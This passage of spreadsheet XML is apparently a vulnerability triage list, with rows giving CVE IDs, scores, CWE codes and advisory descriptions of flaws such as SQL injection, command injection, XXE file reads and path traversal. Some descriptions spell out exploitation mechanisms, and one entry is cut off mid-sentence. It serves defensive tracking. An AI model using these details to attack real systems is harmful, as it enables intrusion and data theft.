        <is>
          <t>CVE-2026-83619</t>
        </is>
      </c>
      <c r="C472" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E472" s="5" t="inlineStr"/>
      <c r="F472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G472" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L472" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.7.0 until 0.8.15, the release-0.8.x parser in lib/sax.js trims captured end-tag names with the unanchored global expression /[ \t\n\r]+$/g. For an end tag containing a long whitespace run followed by a non-whitespace character, the expression retries from each possible starting position and backtracks quadratically before failing its end anchor. DOMParser.parseFromString() reaches the path under default options, allowing a small unauthenticated XML input to stall the Node.js event loop; the 0.9.x and unscoped npm lines do not contain this expression. This issue is fixed in @xmldom/xmldom version 0.8.15.</t>
        </is>
      </c>
      <c r="M472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84202</t>
        </is>
      </c>
      <c r="C473" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E473" s="5" t="inlineStr"/>
      <c r="F473" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G473" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L473" s="5" t="inlineStr">
        <is>
          <t>ModelScope uses PyYAML's unsafe yaml.Loader to parse model configuration files, allowing arbitrary code execution through Python object construction tags. Attackers can craft malicious model repositories with poisoned configuration files that execute code when loaded by users.</t>
        </is>
      </c>
      <c r="M473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84202</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84304</t>
        </is>
      </c>
      <c r="C474" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E474" s="5" t="inlineStr"/>
      <c r="F474" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G474" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L474" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="M474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84304</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84694</t>
        </is>
      </c>
      <c r="C475" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E475" s="5" t="inlineStr"/>
      <c r="F475" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G475" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L475" s="5" t="inlineStr">
        <is>
          <t>Coolify before 4.2.0 fails to properly escape environment variable key names in Docker commands executed over SSH on managed servers. Authenticated attackers can inject shell metacharacters into environment variable keys to execute arbitrary commands on the server host outside containers.</t>
        </is>
      </c>
      <c r="M475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84694</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85155</t>
        </is>
      </c>
      <c r="C476" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E476" s="5" t="inlineStr"/>
      <c r="F476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G476" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L476" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a SQL injection vulnerability in the sort column parameter of the get.json.php endpoint with APIName=channels that allows unauthenticated attackers to order results by arbitrary database columns including users.password and users.recoverPass. Attackers can exploit this ordering oracle to infer password hash values and recovery tokens, and trigger SQL errors that disclose the full query statement and database schema.</t>
        </is>
      </c>
      <c r="M476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85155</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85610</t>
        </is>
      </c>
      <c r="C477" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E477" s="5" t="inlineStr"/>
      <c r="F477" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G477" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L477" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 fails to properly validate chart formula expressions, allowing authenticated project members with read access to execute arbitrary code by recovering the native JavaScript Function constructor through mathjs matrix objects. Attackers can use the recovered constructor to load Node.js built-ins and execute operating system commands with the privileges of the API process, bypassing organization authorization boundaries.</t>
        </is>
      </c>
      <c r="M477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85610</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85687</t>
        </is>
      </c>
      <c r="C478" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E478" s="5" t="inlineStr"/>
      <c r="F478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G478" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L478" s="5" t="inlineStr">
        <is>
          <t>surya 0.22.1 screenshot server contains an unauthenticated arbitrary file read vulnerability in the /info, /page, and /process routes that accept raw file_path parameters. Attackers can read any image or PDF file on the host by supplying arbitrary file paths to Image.open or pypdfium2.PdfDocument, obtaining rendered contents as base64 and using /info as an existence oracle.</t>
        </is>
      </c>
      <c r="M478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85687</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85786</t>
        </is>
      </c>
      <c r="C479" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E479" s="5" t="inlineStr"/>
      <c r="F479" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G479" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L479" s="5" t="inlineStr">
        <is>
          <t>Improper handling of highly compressed data in Amazon ion-java before 1.12.1 might allow remote attackers to cause a denial of service via a crafted compressed Ion document that expands to an arbitrarily large size upon decompression due to insufficient coverage of the GZIP auto-decompression opt-out introduced for CVE-2026-75936.
To remediate this issue, users should upgrade to version 1.12.1.</t>
        </is>
      </c>
      <c r="M479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85786</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86076</t>
        </is>
      </c>
      <c r="C480" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E480" s="5" t="inlineStr"/>
      <c r="F480" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G480" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L480"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M480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86169</t>
        </is>
      </c>
      <c r="C481" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E481" s="5" t="inlineStr"/>
      <c r="F481" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G481" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L481" s="5" t="inlineStr">
        <is>
          <t>Axolotl through 0.18.0 contains a remote code execution vulnerability in the multipack patch path where trust_remote_code defaults to None instead of False, causing the security guard to be bypassed. Attackers can execute arbitrary Python code by crafting a malicious Hugging Face model repository selected as base_model, which is loaded with hardcoded trust_remote_code=True during AutoModelForCausalLM.from_pretrained.</t>
        </is>
      </c>
      <c r="M481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86169</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="C482" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E482" s="5" t="inlineStr"/>
      <c r="F482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G482" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L482"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M482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="C483" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E483" s="5" t="inlineStr"/>
      <c r="F483" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G483" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L483"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M483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88874</t>
        </is>
      </c>
      <c r="C484" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E484" s="5" t="inlineStr"/>
      <c r="F484" s="5" t="inlineStr"/>
      <c r="G484" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L484" s="5" t="inlineStr">
        <is>
          <t>AVideo through revision c3edcc274c389816d434acadac07ee78eaf330c1 (master, 2026-08-23) does not enforce the Live stream password check on the stats endpoint or on the HLS origin. Live::_getStats() (plugin/Live/Live.php) returns a password-protected transmission's RTMP stream key, its isPasswordProtected flag, and its HLS (m3u8) URL to unauthenticated callers, in both the public applications list and the hidden_applications branch used when canSeeLiveFromLiveKey() fails. Separately, the shipped NGINX configuration (deploy/nginx/nginx.conf) serves the .m3u8 playlist, the AES-128 key, and the transport-stream segments from the /live location without any auth_request (the auth_key_check directive in the .key location is commented out). A remote, unauthenticated attacker can therefore retrieve the stream key and decryption key and watch a password-protected live transmission without supplying the configured password. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="M484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88874</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21087</t>
        </is>
      </c>
      <c r="C485" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E485" s="5" t="inlineStr"/>
      <c r="F485" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G485" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H485" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I485" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L485" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libmdnie.so prior to SMR Sep-2026 Release 1 allows local attackers to execute arbitrary code with system server privilege.</t>
        </is>
      </c>
      <c r="M485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21087</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25990</t>
        </is>
      </c>
      <c r="C486" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E486" s="5" t="inlineStr"/>
      <c r="F486" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G486" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H486" s="5" t="inlineStr">
        <is>
          <t>python:pillow</t>
        </is>
      </c>
      <c r="I486" s="5" t="inlineStr">
        <is>
          <t>2026-02-11</t>
        </is>
      </c>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L486" s="5" t="inlineStr">
        <is>
          <t>Pillow is a Python imaging library. From 10.3.0 to before 12.1.1, an out-of-bounds write may be triggered when loading a specially crafted PSD image. This vulnerability is fixed in 12.1.1.</t>
        </is>
      </c>
      <c r="M486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25990</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44492</t>
        </is>
      </c>
      <c r="C487" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E487" s="5" t="inlineStr"/>
      <c r="F487" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G487" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H487" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I487" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr">
        <is>
          <t>CWE-289, CWE-918</t>
        </is>
      </c>
      <c r="L487" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios does not normalise IPv4-mapped IPv6 addresses. When NO_PROXY lists an IPv4 address such as 127.0.0.1 or 169.254.169.254, a request URL using the IPv4-mapped IPv6 form (::ffff:7f00:1, ::ffff:a9fe:a9fe) still routes through the configured proxy. Node.js resolves these addresses to the underlying IPv4 host, so the request reaches the internal service via the proxy rather than being blocked. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44492</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47727</t>
        </is>
      </c>
      <c r="C488" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G488" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L488" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the default-on "Safe import" filter fails to neutralize the shareTemplate relation because that relation is not marked as dangerous, allowing an attacker-supplied import archive to plant a server-side template that leads to remote code execution. The relation is omitted from the built-in list of dangerous attributes, so unlike other code-loading relations it is not disabled on import, and when the victim later publishes the imported note the public share renderer feeds the linked EJS code note's raw bytes into ejs.render, which compiles them in the server's Node process. An unauthenticated request to the shared note then executes the attacker's JavaScript with full access to require, process, the filesystem, and the network. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47727</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50553</t>
        </is>
      </c>
      <c r="C489" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E489" s="5" t="inlineStr"/>
      <c r="F489" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G489" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="L489" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, Note Mark validates book and note slug values with the OpenAPI/huma tag pattern:"[a-z0-9-]+". huma compiles this with regexp.MustCompile(s.Pattern) and tests it with patternRe.MatchString(str), an UNANCHORED match. Because the pattern is not anchored (^...$), any string that merely CONTAINS one [a-z0-9-] substring passes validation. A slug such as ../../../../../../tmp/escape is accepted and stored verbatim. The data-export CLI commands (note-mark migrate export and note-mark migrate export-v1) join these unsanitized slugs straight into the output path with path.Join / filepath.Join, then os.MkdirAll the directory and os.Create the note file. path.Join resolves the ../ segments, so the note content file is written OUTSIDE the configured export directory. The export process commonly runs as root (default in Docker / bare-metal admin usage), so this is a root-privilege arbitrary directory create + file write. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="M489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50553</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55848</t>
        </is>
      </c>
      <c r="C490" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E490" s="5" t="inlineStr"/>
      <c r="F490" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G490" s="5" t="inlineStr">
        <is>
          <t>java, kubernetes</t>
        </is>
      </c>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L490" s="5" t="inlineStr">
        <is>
          <t>mapfish-print is a component of MapFish for printing templated cartographic maps. Prior to 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5, MapFish Print accepts an attacker-controlled GML layer url in requests to the /api/print3/print endpoint and fetches XML parsed by core/src/main/java/org/mapfish/print/map/geotools/GmlLayer.java without disabling external entities and external DTDs. A remote XML document and DTD can expand a local file entity, and the resulting content can be exposed through the GML parsing and error path. This allows unauthenticated attackers to read files such as operating-system account data, Kubernetes service-account tokens, and certificates. Replacing the file entity target with an internal HTTP endpoint also permits server-side request forgery. This issue is fixed in versions 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5.</t>
        </is>
      </c>
      <c r="M490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55848</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67340</t>
        </is>
      </c>
      <c r="C491" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E491" s="5" t="inlineStr"/>
      <c r="F491" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G491" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L491" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.7.2 (arcadedb-engine) allows trigger scripts to look up host classes in java.lang.* (via Java.type) because ScriptTriggerExecutor adds java.lang.* to the allowed packages. An authenticated user with UPDATE_SCHEMA permission can create a JavaScript trigger that invokes java.lang.Runtime.getRuntime().exec() (or ProcessBuilder), achieving OS command execution when the trigger fires.</t>
        </is>
      </c>
      <c r="M491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67340</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67608</t>
        </is>
      </c>
      <c r="C492" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E492" s="5" t="inlineStr"/>
      <c r="F492" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G492" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H492" s="5" t="inlineStr"/>
      <c r="I492" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L492" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain an OS command injection vulnerability in action_audio.php that allows authenticated attackers to execute arbitrary operating system commands by passing an unsanitized pid parameter into an exec() call when the action parameter is set to checkProcess. Attackers can inject malicious OS commands through the pid request parameter to execute arbitrary commands with the privileges of the apache user.</t>
        </is>
      </c>
      <c r="M492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67608</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73247</t>
        </is>
      </c>
